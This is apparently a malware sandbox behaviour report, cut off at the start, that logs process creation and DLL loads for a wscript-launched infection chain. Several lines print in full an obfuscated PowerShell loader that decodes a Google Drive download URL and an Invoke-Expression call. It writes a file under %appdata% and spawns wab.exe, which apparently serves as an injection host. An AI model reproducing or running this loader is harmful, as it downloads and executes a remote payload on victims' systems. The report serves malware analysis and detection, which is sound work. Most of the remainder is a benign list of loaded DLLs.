apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
